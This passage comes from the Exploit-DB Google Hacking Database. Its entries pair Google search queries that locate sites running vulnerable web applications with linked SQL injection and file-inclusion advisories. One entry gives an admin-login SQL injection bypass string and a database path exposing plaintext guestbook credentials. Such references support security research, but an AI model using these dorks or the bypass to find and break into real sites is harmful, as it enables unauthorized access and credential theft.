<link>https://www.exploit-db.com/ghdb/2755</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>album.asp?pic= .jpg cat=</shortDescription>
<textualDescription>aspWebAlbum 3.2 Multiple Remote Vulnerabilities - CVE: 2008-6977: https://www.exploit-db.com/exploits/6420</textualDescription>
<query>album.asp?pic= .jpg cat=</query>
<querystring>https://www.google.com/search?q=album.asp%3Fpic%3D+.jpg+cat%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6420</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2763</id>
<link>https://www.exploit-db.com/ghdb/2763</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>album.asp?pic= .jpg cat=</shortDescription>
<textualDescription>aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6977: https://www.exploit-db.com/exploits/6357</textualDescription>
<query>album.asp?pic= .jpg cat=</query>
<querystring>https://www.google.com/search?q=album.asp%3Fpic%3D+.jpg+cat%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6357</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2307</id>
<link>https://www.exploit-db.com/ghdb/2307</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>alegrocart</shortDescription>
<textualDescription>Alegro 1.2.1 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12278</textualDescription>
<query>alegrocart</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=alegrocart</querystring>
<edb>https://www.exploit-db.com/exploits/12278</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2638</id>
<link>https://www.exploit-db.com/ghdb/2638</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>All right reserved 2002-2003 (MSN/Web Server Creator)</shortDescription>
<textualDescription>Web Server Creator - Web Portal v 0.1 Multi Vulnerability - CVE: 2010-1113: https://www.exploit-db.com/exploits/11569</textualDescription>
<query>All right reserved 2002-2003 (MSN/Web Server Creator)</query>
<querystring>https://www.google.com/search?q=All+right+reserved+2002-2003+(MSN/Web+Server+Creator)</querystring>
<edb>https://www.exploit-db.com/exploits/11569</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1643</id>
<link>https://www.exploit-db.com/ghdb/1643</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext: &quot;This site is powered by IndexScript&quot;</shortDescription>
<textualDescription>IndexScript 2.8 (show_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-4069: https://www.exploit-db.com/exploits/4225</textualDescription>
<query>allintext: &quot;This site is powered by IndexScript&quot;</query>
<querystring>https://www.google.com/search?q=allintext:+%22This+site+is+powered+by+IndexScript%22</querystring>
<edb>https://www.exploit-db.com/exploits/4225</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3683</id>
<link>https://www.exploit-db.com/ghdb/3683</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext: /qcodo/_devtools/codegen.php</shortDescription>
<textualDescription>Information Disclosure: https://www.exploit-db.com/exploits/16116</textualDescription>
<query>allintext: /qcodo/_devtools/codegen.php</query>
<querystring>https://www.google.com/search?q=allintext:%20/qcodo/_devtools/codegen.php</querystring>
<edb>https://www.exploit-db.com/exploits/16116</edb>
<date>2011-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>6396</id>
<link>https://www.exploit-db.com/ghdb/6396</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext: wp-content/themes/injob</shortDescription>
<textualDescription>Description: allintext: wp-content/themes/injob
This google dorks give us the advisories and vulnerabilities on wordpress
plugins.
Ref: https://wpvulndb.com/vulnerabilities/10302
Thanks,
Tanmay Bhattacharjee
</textualDescription>
<query>allintext: wp-content/themes/injob</query>
<querystring>https://www.google.com/search?q=allintext: wp-content/themes/injob</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>2116</id>
<link>https://www.exploit-db.com/ghdb/2116</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:&quot; If you would like to contact us, our email address is&quot; traffic</shortDescription>
<textualDescription>Traffic Stats (referralUrl.php offset) Remote SQL Injection Vulnerbility - CVE: 2007-3840: https://www.exploit-db.com/exploits/4187</textualDescription>
<query>allintext:&quot; If you would like to contact us, our email address is&quot; traffic</query>
<querystring>https://www.google.com/search?q=allintext:%22+If+you+would+like+to+contact+us,+our+email+address+is%22+traffic</querystring>
<edb>https://www.exploit-db.com/exploits/4187</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2002</id>
<link>https://www.exploit-db.com/ghdb/2002</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:&quot;Browse Blogs by Category&quot;</shortDescription>
<textualDescription>Blog System 1.x (index.php news_id) Remote SQL Injection Vulnerability - CVE: 2007-3979: https://www.exploit-db.com/exploits/4206</textualDescription>
<query>allintext:&quot;Browse Blogs by Category&quot;</query>
<querystring>https://www.google.com/search?q=allintext:%22Browse+Blogs+by+Category%22</querystring>
<edb>https://www.exploit-db.com/exploits/4206</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2486</id>
<link>https://www.exploit-db.com/ghdb/2486</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:&quot;Browse our directory of our members top sites or create your own for free!&quot;</shortDescription>
<textualDescription>PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln - CVE: 2007-4054: https://www.exploit-db.com/exploits/4241</textualDescription>
<query>allintext:&quot;Browse our directory of our members top sites or create your own for free!&quot;</query>
<querystring>https://www.google.com/search?q=allintext:%22Browse+our+directory+of+our+members+top+sites+or+create+your+own+for+free!%22</querystring>
<edb>https://www.exploit-db.com/exploits/4241</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2966</id>
<link>https://www.exploit-db.com/ghdb/2966</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:&quot;Home Member Search Chat Room Forum Help/Support privacy policy&quot;</shortDescription>
<textualDescription>eMeeting Online Dating Software 5.2 SQL Injection Vulnerabilities: CVE: 2007-3609: https://www.exploit-db.com/exploits/4154</textualDescription>
<query>allintext:&quot;Home Member Search Chat Room Forum Help/Support privacy policy&quot;</query>
<querystring>https://www.google.com/search?q=allintext:%22Home+Member+Search+Chat+Room+Forum+Help/Support+privacy+policy%22</querystring>
<edb>https://www.exploit-db.com/exploits/4154</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2656</id>
<link>https://www.exploit-db.com/ghdb/2656</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:&quot;Latest Pictures&quot; Name Gender Profile Rating</shortDescription>
<textualDescription>Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility - CVE: 2007-3881: https://www.exploit-db.com/exploits/4191</textualDescription>
<query>allintext:&quot;Latest Pictures&quot; Name Gender Profile Rating</query>
<querystring>https://www.google.com/search?q=allintext:%22Latest+Pictures%22+Name+++Gender+++Profile+++Rating</querystring>
<edb>https://www.exploit-db.com/exploits/4191</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2630</id>
<link>https://www.exploit-db.com/ghdb/2630</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:&quot;Powered By Buddy Zone&quot;</shortDescription>
<textualDescription>Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-3549: https://www.exploit-db.com/exploits/4127</textualDescription>
<query>allintext:&quot;Powered By Buddy Zone&quot;</query>
<querystring>https://www.google.com/search?q=allintext:%22Powered+By+Buddy+Zone%22</querystring>
<edb>https://www.exploit-db.com/exploits/4127</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3074</id>
<link>https://www.exploit-db.com/ghdb/3074</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:&quot;Powered By Buddy Zone&quot;</shortDescription>
<textualDescription>Buddy Zone 1.5 Multiple SQL Injection Vulnerabilities - CVE: 2007-3526: https://www.exploit-db.com/exploits/4128</textualDescription>
<query>allintext:&quot;Powered By Buddy Zone&quot;</query>
<querystring>https://www.google.com/search?q=allintext:%22Powered+By+Buddy+Zone%22</querystring>
<edb>https://www.exploit-db.com/exploits/4128</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2346</id>
<link>https://www.exploit-db.com/ghdb/2346</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:&quot;Powered by: TotalCalendar&quot;</shortDescription>
<textualDescription>TotalCalendar 2.402 (view_event.php) Remote SQL Injection Vulns - CVE: 2007-3515: https://www.exploit-db.com/exploits/4130</textualDescription>
<query>allintext:&quot;Powered by: TotalCalendar&quot;</query>
<querystring>https://www.google.com/search?q=allintext:%22Powered+by:+TotalCalendar%22</querystring>
<edb>https://www.exploit-db.com/exploits/4130</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2010</id>
<link>https://www.exploit-db.com/ghdb/2010</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:&quot;SuperCali Event Calendar&quot;</shortDescription>
<textualDescription>SuperCali PHP Event Calendar 0.4.0 SQL Injection Vulnerability - CVE: 2007-3582: https://www.exploit-db.com/exploits/4141</textualDescription>
<query>allintext:&quot;SuperCali Event Calendar&quot;</query>
<querystring>https://www.google.com/search?q=allintext:%22SuperCali+Event+Calendar%22</querystring>
<edb>https://www.exploit-db.com/exploits/4141</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6380</id>
<link>https://www.exploit-db.com/ghdb/6380</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:wp-content/plugins/acf-to-rest-api</shortDescription>
<textualDescription>Description: allintext:wp-content/plugins/acf-to-rest-api
This google dorks give us the advisories and vulnerabilities on wordpress
plugins.
Ref: https://wpvulndb.com/vulnerabilities/10284
Linkedin : https://www.linkedin.com/in/peaceonmind/
Thanks,
Tanmay Bhattacharjee
</textualDescription>
<query>allintext:wp-content/plugins/acf-to-rest-api</query>
<querystring>https://www.google.com/search?q=allintext:wp-content/plugins/acf-to-rest-api</querystring>
<edb></edb>
<date>2020-07-07</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>6405</id>
<link>https://www.exploit-db.com/ghdb/6405</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintext:wp-content/plugins/angwp</shortDescription>
<textualDescription>Description:allintext:wp-content/plugins/angwp
This google dorks give us the advisories and vulnerabilities on wordpress
plugins.
Ref: https://wpvulndb.com/vulnerabilities/10293
Thanks,
Tanmay Bhattacharjee
</textualDescription>
<query>allintext:wp-content/plugins/angwp</query>
<querystring>https://www.google.com/search?q=allintext:wp-content/plugins/angwp</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>1612</id>
<link>https://www.exploit-db.com/ghdb/1612</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintitle: &quot;MCgallery 0.5b&quot;</shortDescription>
<textualDescription>McGallery 0.5b (download.php) Arbitrary File Download Vulnerability - CVE: 2007-1478: https://www.exploit-db.com/exploits/3494</textualDescription>
<query>allintitle: &quot;MCgallery 0.5b&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:+%22MCgallery+0.5b%22</querystring>
<edb>https://www.exploit-db.com/exploits/3494</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3573</id>
<link>https://www.exploit-db.com/ghdb/3573</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintitle: powered by DeluxeBB</shortDescription>
<textualDescription>DeluxeBB 1.2 Multiple Remote Vulnerabilities - CVE: 2008-2195:
https://www.exploit-db.com/exploits/5550</textualDescription>
<query>allintitle: powered by DeluxeBB</query>
<querystring>https://www.google.com/search?q=allintitle:powered+by+DeluxeBB</querystring>
<edb>https://www.exploit-db.com/exploits/5550</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>879</id>
<link>https://www.exploit-db.com/ghdb/879</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allintitle:aspjar.com guestbook</shortDescription>
<textualDescription>&quot;An input validation vulnerability was reported in the ASPJar guestbook. A remote user can gain administrative access and can delete guestbook messages.The '/admin/login.asp' script does not properly validate user-supplied input in the password field. A remote user can supply the following characters in password field to inject SQL commands and be authenticated as the administrator:&quot;' or ''='I also found another vulnerability that hasn't been documented anywhere. Using the above search to find aspjar guestbooks, appending the guestbook directory with /data/guest.mdb will give you a database containing the plaintext username and password for the guestbook admin and all entries in the guestbook, including IP addresses of users.(This company is no longer in business and the software is no longer being updated so versions shouldn't matter)</textualDescription>
<query>allintitle:aspjar.com guestbook</query>
<querystring>https://www.google.com/search?q=allintitle:aspjar.com+guestbook</querystring>
<edb></edb>
<date>2005-02-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>2056</id>
<link>https://www.exploit-db.com/ghdb/2056</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinur:com_extended_registration</shortDescription>
<textualDescription>Mambo com_registration_detailed 4.1 Remote File Include - CVE: 2006-5254: https://www.exploit-db.com/exploits/2379</textualDescription>
<query>allinur:com_extended_registration</query>
<querystring>https://www.google.com/search?q=allinur:com_extended_registration</querystring>
<edb>https://www.exploit-db.com/exploits/2379</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2248</id>
<link>https://www.exploit-db.com/ghdb/2248</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl : /web3news/</shortDescription>
<textualDescription>Web3news 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln - CVE: 2006-4452: https://www.exploit-db.com/exploits/2269</textualDescription>
<query>allinurl : /web3news/</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=allinurl+:+/web3news/</querystring>
<edb>https://www.exploit-db.com/exploits/2269</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2562</id>
<link>https://www.exploit-db.com/ghdb/2562</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl :&quot;/modules/tutorials/&quot;</shortDescription>
<textualDescription>XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability - CVE: 2008-1351: https://www.exploit-db.com/exploits/5245</textualDescription>
<query>allinurl :&quot;/modules/tutorials/&quot;</query>
<querystring>https://www.google.com/search?q=allinurl+:%22/modules/tutorials/%22</querystring>
<edb>https://www.exploit-db.com/exploits/5245</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1874</id>
<link>https://www.exploit-db.com/ghdb/1874</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl :&quot;modules/eblog&quot;</shortDescription>
<textualDescription>eXV2 Module eblog 1.2 (blog_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5253</textualDescription>
<query>allinurl :&quot;modules/eblog&quot;</query>
<querystring>https://www.google.com/search?q=allinurl+:%22modules/eblog%22</querystring>
<edb>https://www.exploit-db.com/exploits/5253</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1952</id>
<link>https://www.exploit-db.com/ghdb/1952</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl :&quot;modules/gallery&quot;</shortDescription>
<textualDescription>XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5241</textualDescription>
<query>allinurl :&quot;modules/gallery&quot;</query>
<querystring>https://www.google.com/search?q=allinurl+:%22modules/gallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/5241</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2127</id>
<link>https://www.exploit-db.com/ghdb/2127</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl :&quot;modules/recipe&quot;</shortDescription>
<textualDescription>XOOPS Module Recipe (detail.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5473</textualDescription>
<query>allinurl :&quot;modules/recipe&quot;</query>
<querystring>https://www.google.com/search?q=allinurl+:%22modules/recipe%22</querystring>
<edb>https://www.exploit-db.com/exploits/5473</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1856</id>
<link>https://www.exploit-db.com/ghdb/1856</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl :&quot;wp-content/plugins/st_newsletter&quot;</shortDescription>
<textualDescription>Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability - CVE: 2008-0683: https://www.exploit-db.com/exploits/5053</textualDescription>
<query>allinurl :&quot;wp-content/plugins/st_newsletter&quot;</query>
<querystring>https://www.google.com/search?q=allinurl+:%22wp-content/plugins/st_newsletter%22</querystring>
<edb>https://www.exploit-db.com/exploits/5053</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2038</id>
<link>https://www.exploit-db.com/ghdb/2038</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;/modules/myTopics/&quot;</shortDescription>
<textualDescription>XOOPS Module myTopics (articleid) Remote SQL Injection Vulnerability - CVE: 2008-0847: https://www.exploit-db.com/exploits/5148</textualDescription>
<query>allinurl: &quot;/modules/myTopics/&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22/modules/myTopics/%22</querystring>
<edb>https://www.exploit-db.com/exploits/5148</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2244</id>
<link>https://www.exploit-db.com/ghdb/2244</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;com_actualite&quot;</shortDescription>
<textualDescription>Joomla Component actualite 1.0 (id) SQL Injection Vulnerability - CVE: 2008-4617: https://www.exploit-db.com/exploits/5337</textualDescription>
<query>allinurl: &quot;com_actualite&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=allinurl:+%22com_actualite%22</querystring>
<edb>https://www.exploit-db.com/exploits/5337</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1743</id>
<link>https://www.exploit-db.com/ghdb/1743</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;com_alberghi&quot; detail</shortDescription>
<textualDescription>Joomla Component Alberghi 2.1.3 (id) SQL Injection Vulnerability - CVE: 2008-1459: https://www.exploit-db.com/exploits/5278</textualDescription>
<query>allinurl: &quot;com_alberghi&quot; detail</query>
<querystring>https://www.google.com/search?q=allinurl:+%22com_alberghi%22+detail</querystring>
<edb>https://www.exploit-db.com/exploits/5278</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2314</id>
<link>https://www.exploit-db.com/ghdb/2314</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;com_estateagent&quot;</shortDescription>
<textualDescription>Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability - CVE: 2008-0517: https://www.exploit-db.com/exploits/5016</textualDescription>
<query>allinurl: &quot;com_estateagent&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=allinurl:+%22com_estateagent%22</querystring>
<edb>https://www.exploit-db.com/exploits/5016</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1448</id>
<link>https://www.exploit-db.com/ghdb/1448</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;com_galeria&quot;</shortDescription>
<textualDescription>Joomla Component com_galeria Remote SQL Injection Vulnerability - CVE: 2008-0833: https://www.exploit-db.com/exploits/5134</textualDescription>
<query>allinurl: &quot;com_galeria&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22com_galeria%22</querystring>
<edb>https://www.exploit-db.com/exploits/5134</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1683</id>
<link>https://www.exploit-db.com/ghdb/1683</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;com_glossary&quot;</shortDescription>
<textualDescription>Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability - CVE: 2008-0514: https://www.exploit-db.com/exploits/5010</textualDescription>
<query>allinurl: &quot;com_glossary&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22com_glossary%22</querystring>
<edb>https://www.exploit-db.com/exploits/5010</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1480</id>
<link>https://www.exploit-db.com/ghdb/1480</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;com_joovideo&quot; detail</shortDescription>
<textualDescription>Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability - CVE: 2008-1460: https://www.exploit-db.com/exploits/5277</textualDescription>
<query>allinurl: &quot;com_joovideo&quot; detail</query>
<querystring>https://www.google.com/search?q=allinurl:+%22com_joovideo%22+detail</querystring>
<edb>https://www.exploit-db.com/exploits/5277</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1475</id>
<link>https://www.exploit-db.com/ghdb/1475</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;com_rapidrecipe&quot;user_id</shortDescription>
<textualDescription>Joomla Component rapidrecipe 1.6.5 SQL Injection Vulnerability - CVE: 2008-0754: https://www.exploit-db.com/exploits/5103</textualDescription>
<query>allinurl: &quot;com_rapidrecipe&quot;user_id</query>
<querystring>https://www.google.com/search?q=allinurl:+%22com_rapidrecipe%22user_id</querystring>
<edb>https://www.exploit-db.com/exploits/5103</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2277</id>
<link>https://www.exploit-db.com/ghdb/2277</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;index php p shop&quot;categ</shortDescription>
<textualDescription>Koobi Pro 6.25 shop Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5412</textualDescription>
<query>allinurl: &quot;index php p shop&quot;categ</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=allinurl:+%22index+php+p+shop%22categ</querystring>
<edb>https://www.exploit-db.com/exploits/5412</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2086</id>
<link>https://www.exploit-db.com/ghdb/2086</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;index.php?area&quot;galid</shortDescription>
<textualDescription>Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5414</textualDescription>
<query>allinurl: &quot;index.php?area&quot;galid</query>
<querystring>https://www.google.com/search?q=allinurl:+%22index.php%3Farea%22galid</querystring>
<edb>https://www.exploit-db.com/exploits/5414</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2384</id>
<link>https://www.exploit-db.com/ghdb/2384</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;index.php?mod=galerie&quot;action=gal</shortDescription>
<textualDescription>KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability - CVE: 2008-6197: https://www.exploit-db.com/exploits/5350</textualDescription>
<query>allinurl: &quot;index.php?mod=galerie&quot;action=gal</query>
<querystring>https://www.google.com/search?q=allinurl:+%22index.php%3Fmod%3Dgalerie%22action%3Dgal</querystring>
<edb>https://www.exploit-db.com/exploits/5350</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1461</id>
<link>https://www.exploit-db.com/ghdb/1461</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;index.php?option=com_doc&quot;</shortDescription>
<textualDescription>Joomla Component com_doc Remote SQL Injection Vulnerability - CVE: 2008-0772: https://www.exploit-db.com/exploits/5080</textualDescription>
<query>allinurl: &quot;index.php?option=com_doc&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22index.php%3Foption%3Dcom_doc%22</querystring>
<edb>https://www.exploit-db.com/exploits/5080</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1602</id>
<link>https://www.exploit-db.com/ghdb/1602</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;index.php?p=gallerypic img_id&quot;</shortDescription>
<textualDescription>Koobi Pro v6.1 gallery (img_id) - CVE: 2008-6210: https://www.exploit-db.com/exploits/10751</textualDescription>
<query>allinurl: &quot;index.php?p=gallerypic img_id&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22index.php%3Fp%3Dgallerypic+img_id%22</querystring>
<edb>https://www.exploit-db.com/exploits/10751</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2607</id>
<link>https://www.exploit-db.com/ghdb/2607</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;index.php?p=gallerypic img_id&quot;</shortDescription>
<textualDescription>Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability - CVE: 2008-6210: https://www.exploit-db.com/exploits/5415</textualDescription>
<query>allinurl: &quot;index.php?p=gallerypic img_id&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22index.php%3Fp%3Dgallerypic+img_id%22</querystring>
<edb>https://www.exploit-db.com/exploits/5415</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1479</id>
<link>https://www.exploit-db.com/ghdb/1479</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;index.php?p=poll&quot;showresult</shortDescription>
<textualDescription>Koobi Pro 6.25 poll Remote SQL Injection Vulnerability - CVE: 2008-2036: https://www.exploit-db.com/exploits/5448</textualDescription>
<query>allinurl: &quot;index.php?p=poll&quot;showresult</query>
<querystring>https://www.google.com/search?q=allinurl:+%22index.php%3Fp%3Dpoll%22showresult</querystring>
<edb>https://www.exploit-db.com/exploits/5448</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2299</id>
<link>https://www.exploit-db.com/ghdb/2299</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;index.php?showlink&quot;links</shortDescription>
<textualDescription>Koobi Pro 6.25 links Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5411</textualDescription>
<query>allinurl: &quot;index.php?showlink&quot;links</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=allinurl:+%22index.php%3Fshowlink%22links</querystring>
<edb>https://www.exploit-db.com/exploits/5411</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1986</id>
<link>https://www.exploit-db.com/ghdb/1986</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;modules MyAnnonces index php pa view&quot;</shortDescription>
<textualDescription>RunCMS Module MyAnnonces (cid) SQL Injection Vulnerability - CVE: 2008-0878: https://www.exploit-db.com/exploits/5156</textualDescription>
<query>allinurl: &quot;modules MyAnnonces index php pa view&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22modules+MyAnnonces+index+php+pa+view%22</querystring>
<edb>https://www.exploit-db.com/exploits/5156</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1476</id>
<link>https://www.exploit-db.com/ghdb/1476</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;modules/dictionary&quot;</shortDescription>
<textualDescription>XOOPS Module Dictionary 0.94 Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5267</textualDescription>
<query>allinurl: &quot;modules/dictionary&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22modules/dictionary%22</querystring>
<edb>https://www.exploit-db.com/exploits/5267</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1732</id>
<link>https://www.exploit-db.com/ghdb/1732</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;modules/dictionary/detail.php?id&quot;</shortDescription>
<textualDescription>XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability - CVE: 2009-4582: https://www.exploit-db.com/exploits/10807</textualDescription>
<query>allinurl: &quot;modules/dictionary/detail.php?id&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22modules/dictionary/detail.php%3Fid%22</querystring>
<edb>https://www.exploit-db.com/exploits/10807</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1454</id>
<link>https://www.exploit-db.com/ghdb/1454</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;modules/eEmpregos/index.php&quot;</shortDescription>
<textualDescription>XOOPS Module eEmpregos (cid) Remote SQL Injection Vulnerability - CVE: 2008-0874: https://www.exploit-db.com/exploits/5157</textualDescription>
<query>allinurl: &quot;modules/eEmpregos/index.php&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22modules/eEmpregos/index.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/5157</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1957</id>
<link>https://www.exploit-db.com/ghdb/1957</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>allinurl: &quot;modules/glossaires&quot;</shortDescription>
<textualDescription>XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5216</textualDescription>
<query>allinurl: &quot;modules/glossaires&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:+%22modules/glossaires%22</querystring>
<edb>https://www.exploit-db.com/exploits/5216</edb>
<date>2010-11-15</date>
